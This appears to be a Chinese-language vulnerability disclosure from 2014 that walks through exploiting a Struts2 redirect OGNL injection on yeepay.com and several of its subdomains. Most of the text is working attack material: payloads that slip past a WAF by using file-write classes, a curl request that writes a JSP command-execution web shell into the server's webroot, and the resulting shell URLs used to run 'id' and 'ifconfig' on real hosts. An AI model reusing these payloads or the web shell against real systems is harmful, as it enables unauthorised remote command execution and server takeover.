http://www.yeepay.com/individualservice/Login.action 看到action习惯性测试struts漏洞,http://www.yeepay.com/individualservice/Login.action?redirect:/xxoo
HTTP/1.1 302 Moved Temporarily Server: Tengine/2.0.3 Date: Sat, 20 Dec 2014 08:34:12 GMT Content-Length: 0 Connection: keep-alive Location: http://www.yeepay.com/individualservice/xxoo Content-Language: zh-CN Set-Cookie: BIGipServerpool_css=2736695488.36895.0000; expires=Sat, 20-Dec-2014 8:49:12 GMT; path=/
咦,跳转了,有戏,果断上命令exp。最后却发现被waf拦截了。
不死心继续。。。测试发现waf过滤了allowStaticMethodAccess、processBuilder,命令执行无望,尝试能不能写shell。 http://www.yeepay.com/individualservice/Login.action?java.io.File ---> is OK http://www.yeepay.com/individualservice/Login.action?java.io.PrintWriter --->is OK 可以File操作,看来只针对命令执行的exp提取关键字添加规则进行过滤,对File操作是放行的。下面就开始写shell了。 0x1 找web目录 org.apache.catalina.jsp_classpath里面包含得有项目部署路径,可以从中找出来。由于yeepay web容器为jboss,对url长度好像有限制,所以需要截取(自己本地Tomcat测试则没有)。检索individualservice位置:
http://www.yeepay.com/individualservice/Login.action?redirect:${%23application.get(%27org.apache.catalina.jsp_classpath%27).indexOf(%22individualservice%22)} HTTP/1.1 302 Moved Temporarily Server: Tengine/2.0.3 Date: Sat, 20 Dec 2014 08:55:06 GMT Content-Length: 0 Connection: keep-alive Location: http://www.yeepay.com/individualservice/8232 Content-Language: zh-CN
位置为8232,substring调整长度:
curl -i http://www.yeepay.com/individualservice/Login.action -d 'redirect:${%23application.get(%27org.apache.catalina.jsp_classpath%27).substring(8100,8400)}' HTTP/1.1 302 Moved Temporarily Server: Tengine/2.0.3 Date: Sat, 20 Dec 2014 10:01:42 GMT Content-Length: 0 Connection: keep-alive Location: http://www.yeepay.com/individualservice/efault/tmp/deploy/tmp4813126319445231330servlets-default.jar:/export/home/jboss-4.0.3SP1/server/default/deploy/jbossweb-tomcat55.sar/:/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war/:/export/home/jboss-4.0.3SP1/lib/gnu-regexp.jar:/export/home/jboss-4.0.3SP1/server/default/lib Content-Language: zh-CN Set-Cookie: BIGipServerpool_css=186558656.36895.0000; expires=Sat, 20-Dec-2014 10:16:42 GMT; path=/
找到web目录: /export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war 0x2 写shell
curl -i 'http://www.yeepay.com/individualservice/Login.action' -d 'redirect:${(%23a%3d(new%20java.io.PrintWriter(%22/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war/lala.jsp%22)),%23a.write(%27%3C%25%40%20page%20import%3D%22java.io.*%22%20%25%3E%20%3C%25%20String%20cmd%20%3D%20request.getParameter(%22cmd%22)%3B%20String%20output%20%3D%20%22%22%3B%20if(cmd%20!%3D%20null)%20%7B%20String%20s%20%3D%20null%3B%20try%20%7B%20Process%20p%20%3D%20Runtime.getRuntime().exec(cmd)%3B%20BufferedReader%20sI%20%3D%20new%20BufferedReader(new%20InputStreamReader(p.getInputStream()))%3B%20while((s%20%3D%20sI.readLine())%20!%3D%20null)%20%7B%20output%20%2B%3D%20s%20%2B%22%5C%5Cr%5C%5Cn%22%3B%20%7D%20%7D%20catch(IOException%20e)%20%7B%20e.printStackTrace()%3B%20%7D%20%7D%20%25%3E%20%3Cpre%3E%20%3C%25%3Doutput%20%25%3E%20%3C%2Fpre%3E%27),%23a.close())%2b%23a}' HTTP/1.1 302 Moved Temporarily Server: Tengine/2.0.3 Date: Sat, 20 Dec 2014 10:04:00 GMT Content-Length: 0 Connection: keep-alive Location: http://www.yeepay.com/individualservice/nulljava.io.PrintWriter@1517394 Content-Language: zh-CN Set-Cookie: BIGipServerpool_css=2736695488.36895.0000; expires=Sat, 20-Dec-2014 10:19:00 GMT; path=/
shell地址: http://www.yeepay.com/individualservice/lala.jsp
存在同一问题其他站点应用:
http://www.yeepay.com/selfservice/requestRegister.action http://m.yeepay.com/donategroup/PrintDonateCert.action http://gongyi.yeepay.com/mlove/showMediaInfo.action http://zht.yeepay.com/zhtservice/login.action
http://www.yeepay.com/individualservice/lala.jsp?cmd=id
http://zht.yeepay.com/zhtservice/lala.jsp?cmd=/sbin/ifconfig
http://m.yeepay.com/boss_donategroup/test.txt http://m.yeepay.com/donategroup/test.txt